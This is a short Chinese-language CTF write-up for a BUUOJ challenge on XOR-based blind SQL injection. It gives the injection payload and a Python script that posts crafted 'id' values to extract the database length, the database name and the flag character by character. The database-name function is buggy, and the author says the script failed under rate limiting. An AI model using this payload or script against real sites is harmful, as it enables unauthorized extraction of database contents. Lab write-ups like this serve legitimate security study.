0x00:写在前面
异或注入以前碰到的少
今天来记录一下
复现地址:https://buuoj.cn/
0x01:异或注入
0x02:盲注payload
id=(ascii(substr((select(flag)from(flag)),1,1000))>1)^1
import requests url="http://170a957a-daae-4912-8f7e-5452c854f8de.node3.buuoj.cn/index.php" def DBlen():#盲注数据库长度 for i in range(1, 40): # (length(database()) > 1) ^ 1 parm = "(length(database())>" + str(i) + ")^1" data = {'id': parm} req = requests.post(url, data) if ("Hello, glzjin wants a girlfriend." in req.text): return i def DBname(dblen):#盲注数据库名字 #(ascii(substr(database(),2,11))>100)^1 dbname="" for i in range(0,dblen): for j in range(0,300): parm = "(ascii(substr(database(),"+str(i)+","+str(dblen)+"))>"+str(j)+")^1" data = {'id', parm} req = requests.post(url, parm) if ("Hello, glzjin wants a girlfriend." in req.text): dbname+=chr(j) continue return dbname def getflag(): #payload="(ascii(substr((select(flag)from(flag)),1,1000))>102)^1" flag="" for j in range(1,50): for i in range(1, 256): parm = "(ascii(substr((select(flag)from(flag)),%s,1000))>%s)^1" % (str(j), str(i)) data = {'id': parm} req = requests.post(url, data) if ("Hello, glzjin wants a girlfriend." in req.text): flag += chr(i) continue return flag def main(): length=DBlen()#数据库长度 print("数据库长度:"+str(length)) dbname=DBname(length) print("数据库名字:"+dbname) def main1(): print(getflag()) if __name__ == '__main__': main1()
这题用盲注来
ascii:取字符串第一个的字符的ascii
substr:切割(mysql里的substr的start是从1开始),substr的len可以无限大,这个不影响
根据(ascii(substr((select(flag)from(flag)),1,1000))>1)的值来进行异或,这个值为1或者0
再和1进行异或,根据页面回显即可判断出最终flag
环境问题,脚本跑不了,请求过于频繁则429